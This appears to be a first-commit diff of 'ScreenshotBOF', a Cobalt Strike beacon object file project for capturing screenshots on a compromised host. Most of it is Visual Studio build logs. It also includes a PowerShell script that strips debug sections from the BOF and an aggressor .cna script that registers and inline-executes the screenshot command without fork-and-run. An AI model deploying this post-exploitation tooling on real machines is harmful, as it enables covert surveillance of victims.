76	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\WINERROR.H
77	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\TIMEZONEAPI.H
78	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINGDI.H
79	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINUSER.H
80	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\TVOUT.H
81	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINNLS.H
82	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\DATETIMEAPI.H
83	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\STRINGAPISET.H
84	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINCON.H
85	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINCONTYPES.H
86	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\CONSOLEAPI.H
87	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\CONSOLEAPI2.H
88	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\CONSOLEAPI3.H
89	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINVER.H
90	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\VERRSRC.H
91	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINREG.H
92	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\REASON.H
93	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINNETWK.H
94	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\WNNC.H
95	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\CDERR.H
96	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\DDE.H
97	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\DDEML.H
98	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\DLGS.H
99	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\LZEXPAND.H
100	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MMSYSTEM.H
101	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MMSYSCOM.H
102	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MCIAPI.H
103	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MMISCAPI.H
104	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MMISCAPI2.H
105	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\PLAYSOUNDAPI.H
106	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MMEAPI.H
107	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\TIMEAPI.H
108	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\JOYSTICKAPI.H
109	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\NB30.H
110	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\RPC.H
111	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\RPCDCE.H
112	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\RPCDCEP.H
113	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\RPCNSI.H
114	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\RPCNTERR.H
115	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\RPCASYNC.H
116	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\SHELLAPI.H
117	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINPERF.H
118	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINSOCK.H
119	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\INADDR.H
120	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINCRYPT.H
121	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\BCRYPT.H
122	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\NCRYPT.H
123	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\DPAPI.H
124	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINEFS.H
125	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINSCARD.H
126	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\WTYPES.H
127	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\RPCNDR.H
128	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\RPCNSIP.H
129	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\RPCSAL.H
130	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\WTYPESBASE.H
131	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINIOCTL.H
132	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\WINSMCRD.H
133	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINSPOOL.H
134	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\PRSHT.H
135	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\OLE2.H
136	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\OBJBASE.H
137	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\COMBASEAPI.H
138	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\STDLIB.H
139	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT_MALLOC.H
140	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT_SEARCH.H
141	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\STDDEF.H
142	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT_WSTDLIB.H
143	+	C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\COMMUNITY\VC\TOOLS\MSVC\14.27.29110\INCLUDE\LIMITS.H
144	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\UNKNWNBASE.H
145	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\OBJIDLBASE.H
146	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\CGUID.H
147	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\COML2API.H
148	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\OBJIDL.H
149	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\UNKNWN.H
150	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\PROPIDLBASE.H
151	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\OAIDL.H
152	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\URLMON.H
153	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\OLEIDL.H
154	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\SERVPROV.H
155	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MSXML.H
156	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\PROPIDL.H
157	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\OLEAUTO.H
158	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\COMMDLG.H
159	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\SHARED\STRALIGN.H
160	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\WINSVC.H
161	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\MCX.H
162	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\IMM.H
163	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UM\IME_CMODES.H
164	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\STDIO.H
165	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT_WSTDIO.H
166	+	C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.18362.0\UCRT\CORECRT_STDIO_CONFIG.H
167	+	C:\USERS\ETHAN\DOWNLOADS\AVEXCEPTION\CODEX_ARSENAL\PUBLIC\SCREENSHOT_BOF\SCREENSHOTBOF\SCREENSHOTBOF\BOFDEFS.H
168	+	C:\USERS\ETHAN\DOWNLOADS\AVEXCEPTION\CODEX_ARSENAL\PUBLIC\SCREENSHOT_BOF\SCREENSHOTBOF\SCREENSHOTBOF\BEACON.H
169	+

■ ■ ■ ■ ■ ■

ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.write.1.tlog

1	+	^C:\USERS\ETHAN\DOWNLOADS\AVEXCEPTION\CODEX_ARSENAL\PUBLIC\SCREENSHOT_BOF\SCREENSHOTBOF\SCREENSHOTBOF\SOURCE.CPP
2	+	C:\USERS\ETHAN\DOWNLOADS\AVEXCEPTION\CODEX_ARSENAL\PUBLIC\SCREENSHOT_BOF\SCREENSHOTBOF\SCREENSHOTBOF\INTERMEDIARY\BOF\X86\SOURCE.OBJ
3	+

■ ■ ■ ■ ■ ■

ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate

1	+	PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0:
2	+	BOF\|Win32\|C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\\|
3	+

■ ■ ■ ■ ■ ■

ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.vcxproj.FileListAbsolute.txt

1

+

■ ■ ■ ■ ■ ■

ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.Build.CppClean.log

1	+	c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\source.obj
2	+	c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\bin\bof\screenshotbof.x86.obj
3	+	c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.command.1.tlog
4	+	c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.read.1.tlog
5	+	c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.write.1.tlog
6	+

■ ■ ■ ■ ■ ■

ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.recipe

1	+	<?xml version="1.0" encoding="utf-8"?>
2	+	<Project>
3	+	<ProjectOutputs>C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\bin\BOF\ScreenshotBOFx32</ProjectOutputs>
4	+	<ContentFiles></ContentFiles>
5	+	<SatelliteDlls></SatelliteDlls>
6	+	<NonRecipeFileRefs></NonRecipeFileRefs>
7	+	</Project>

ScreenshotBOF/intermediary/BOF/x86/source.obj

Binary file.

■ ■ ■ ■ ■ ■

ScreenshotBOF/resources/strip_bof.ps1

1	+	function strip-bof {
2	+	<#
3	+	.SYNOPSIS
4	+	Removes debug symbols from a beacon object file
5	+
6	+	Heavily dependent on code by Matthew Graeber (@mattifestation)
7	+	Original code: https://www.powershellgallery.com/packages/PowerSploit/1.0.0.0/Content/PETools%5CGet-ObjDump.ps1
8	+	Author: Yasser Alhazmi (@yas_o_h)
9	+	License: BSD 3-Clause
10	+
11	+	.PARAMETER Path
12	+
13	+	Specifies a path to one or more object file locations.
14	+
15	+	.EXAMPLE
16	+
17	+	C:\PS>strip-bof -Path main.obj
18	+
19	+	#>
20	+
21	+	[CmdletBinding()] Param (
22	+	[Parameter(Position = 0, Mandatory = $True)]
23	+	[ValidateScript({ Test-Path $_ })]
24	+	[String]
25	+	$Path
26	+	)
27	+
28	+
29	+	$Code = @'
30	+	using System;
31	+	using System.IO;
32	+	using System.Text;
33	+
34	+	namespace COFF
35	+	{
36	+
37	+
38	+	public class SECTION_HEADER
39	+	{
40	+	public string Name;
41	+	public uint PhysicalAddress;
42	+	public uint VirtualSize;
43	+	public uint VirtualAddress;
44	+	public uint SizeOfRawData;
45	+	public uint PointerToRawData;
46	+	public uint PointerToRelocations;
47	+	public uint PointerToLinenumbers;
48	+	public ushort NumberOfRelocations;
49	+	public ushort NumberOfLinenumbers;
50	+	public uint Characteristics;
51	+	public Byte[] RawData;
52	+
53	+	public SECTION_HEADER(BinaryReader br)
54	+	{
55	+	this.Name = Encoding.UTF8.GetString(br.ReadBytes(8)).Split((Char) 0)[0];
56	+	this.PhysicalAddress = br.ReadUInt32();
57	+	this.VirtualSize = this.PhysicalAddress;
58	+	this.VirtualAddress = br.ReadUInt32();
59	+	this.SizeOfRawData = br.ReadUInt32();
60	+	this.PointerToRawData = br.ReadUInt32();
61	+	this.PointerToRelocations = br.ReadUInt32();
62	+	this.PointerToLinenumbers = br.ReadUInt32();
63	+	this.NumberOfRelocations = br.ReadUInt16();
64	+	this.NumberOfLinenumbers = br.ReadUInt16();
65	+	this.Characteristics = br.ReadUInt32();
66	+	}
67	+	}
68	+
69	+
70	+	public class HEADER
71	+	{
72	+	public ushort Machine;
73	+	public ushort NumberOfSections;
74	+	public uint TimeDateStamp;
75	+	public uint PointerToSymbolTable;
76	+	public uint NumberOfSymbols;
77	+	public ushort SizeOfOptionalHeader;
78	+	public ushort Characteristics;
79	+
80	+	public HEADER(BinaryReader br)
81	+	{
82	+	this.Machine = br.ReadUInt16();
83	+	this.NumberOfSections = br.ReadUInt16();
84	+	this.TimeDateStamp = br.ReadUInt32();
85	+	this.PointerToSymbolTable = br.ReadUInt32();
86	+	this.NumberOfSymbols = br.ReadUInt32();
87	+	this.SizeOfOptionalHeader = br.ReadUInt16();
88	+	this.Characteristics = br.ReadUInt16();
89	+	}
90	+	}
91	+	}
92	+	'@
93	+
94	+	Add-Type -TypeDefinition $Code
95	+	Write-Host "enumerating sections..."
96	+	try {
97	+	$FileStream = [IO.File]::OpenRead($Path)
98	+	$BinaryReader = New-Object IO.BinaryReader($FileStream)
99	+	$CoffHeader = New-Object COFF.HEADER($BinaryReader)
100	+
101	+	# Parse section headers
102	+	$SectionHeaders = New-Object COFF.SECTION_HEADER[]($CoffHeader.NumberOfSections)
103	+
104	+	for ($i = 0; $i -lt $CoffHeader.NumberOfSections; $i++)
105	+	{
106	+	$SectionHeaders[$i] = New-Object COFF.SECTION_HEADER($BinaryReader)
107	+
108	+	if($SectionHeaders[$i].Name.Contains("debug")){
109	+	Write-Host "found debug section.. zeroing it..."
110	+	$FileStream.Close();
111	+	$FileStream2 = [IO.File]::OpenWrite($Path)
112	+	$FileStream2.Seek($SectionHeaders[$i].PointerToRawData, 'Begin') \| Out-Null
113	+	for($x = 0; $x -lt $SectionHeaders[$i].SizeOfRawData; $x++){
114	+	$FileStream2.WriteByte(0)
115	+	}
116	+	Write-Host "closing stream...";
117	+	$FileStream2.Close();
118	+	Write-Host "done!";
119	+	return;
120	+	}
121	+	}
122	+	} catch {
123	+	Add-Type -AssemblyName PresentationFramework
124	+	[System.Windows.MessageBox]::Show("error stripping debug symbols: " + $_.ToString());
125	+	return;
126	+	}
127	+	}

■ ■ ■ ■ ■ ■

ScreenshotBOF.sln

1	+
2	+	Microsoft Visual Studio Solution File, Format Version 12.00
3	+	# Visual Studio Version 16
4	+	VisualStudioVersion = 16.0.30517.126
5	+	MinimumVisualStudioVersion = 10.0.40219.1
6	+	Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ScreenshotBOF", "ScreenshotBOF\ScreenshotBOF.vcxproj", "{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}"
7	+	EndProject
8	+	Global
9	+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10	+	BOF\|x64 = BOF\|x64
11	+	BOF\|x86 = BOF\|x86
12	+	Debug\|x64 = Debug\|x64
13	+	Debug\|x86 = Debug\|x86
14	+	Release\|x64 = Release\|x64
15	+	Release\|x86 = Release\|x86
16	+	EndGlobalSection
17	+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
18	+	{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF\|x64.ActiveCfg = BOF\|x64
19	+	{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF\|x64.Build.0 = BOF\|x64
20	+	{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF\|x86.ActiveCfg = BOF\|Win32
21	+	{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF\|x86.Build.0 = BOF\|Win32
22	+	{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug\|x64.ActiveCfg = Debug\|x64
23	+	{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug\|x64.Build.0 = Debug\|x64
24	+	{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug\|x86.ActiveCfg = Debug\|Win32
25	+	{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug\|x86.Build.0 = Debug\|Win32
26	+	{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release\|x64.ActiveCfg = Release\|x64
27	+	{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release\|x64.Build.0 = Release\|x64
28	+	{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release\|x86.ActiveCfg = Release\|Win32
29	+	{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release\|x86.Build.0 = Release\|Win32
30	+	EndGlobalSection
31	+	GlobalSection(SolutionProperties) = preSolution
32	+	HideSolutionNode = FALSE
33	+	EndGlobalSection
34	+	GlobalSection(ExtensibilityGlobals) = postSolution
35	+	SolutionGuid = {BB40A5A4-261A-4411-8CC0-615E484001A5}
36	+	EndGlobalSection
37	+	EndGlobal
38	+

bin/BOF/ScreenshotBOF.x64.obj

Binary file.

bin/BOF/ScreenshotBOF.x86.obj

Binary file.

■ ■ ■ ■ ■ ■

bin/BOF/screenshotBOF.cna

1	+	#Register command
2	+	beacon_command_register(
3	+	"screenshot_bof",
4	+	"Alternative screenshot capability that does not do fork n run",
5	+	"Synopsis: screenshot_bof"
6	+	);
7	+
8	+	alias screenshot_bof {
9	+	local('$barch $handle $data $args $target_pid');
10	+	println(@_);
11	+	# figure out the arch of this session
12	+	$barch = barch($1);
13	+	# read in the right BOF file
14	+	$handle = openf(script_resource("screenshotBOF. $+ $barch $+ .obj"));
15	+	$data = readb($handle, -1);
16	+	closef($handle);
17	+	# announce what we're doing
18	+	btask($1, "Running screenshot BOF by (@codex_tf2)");
19	+	# execute it.
20	+	beacon_inline_execute($1, $data, "go", $args);
21	+	}

first commit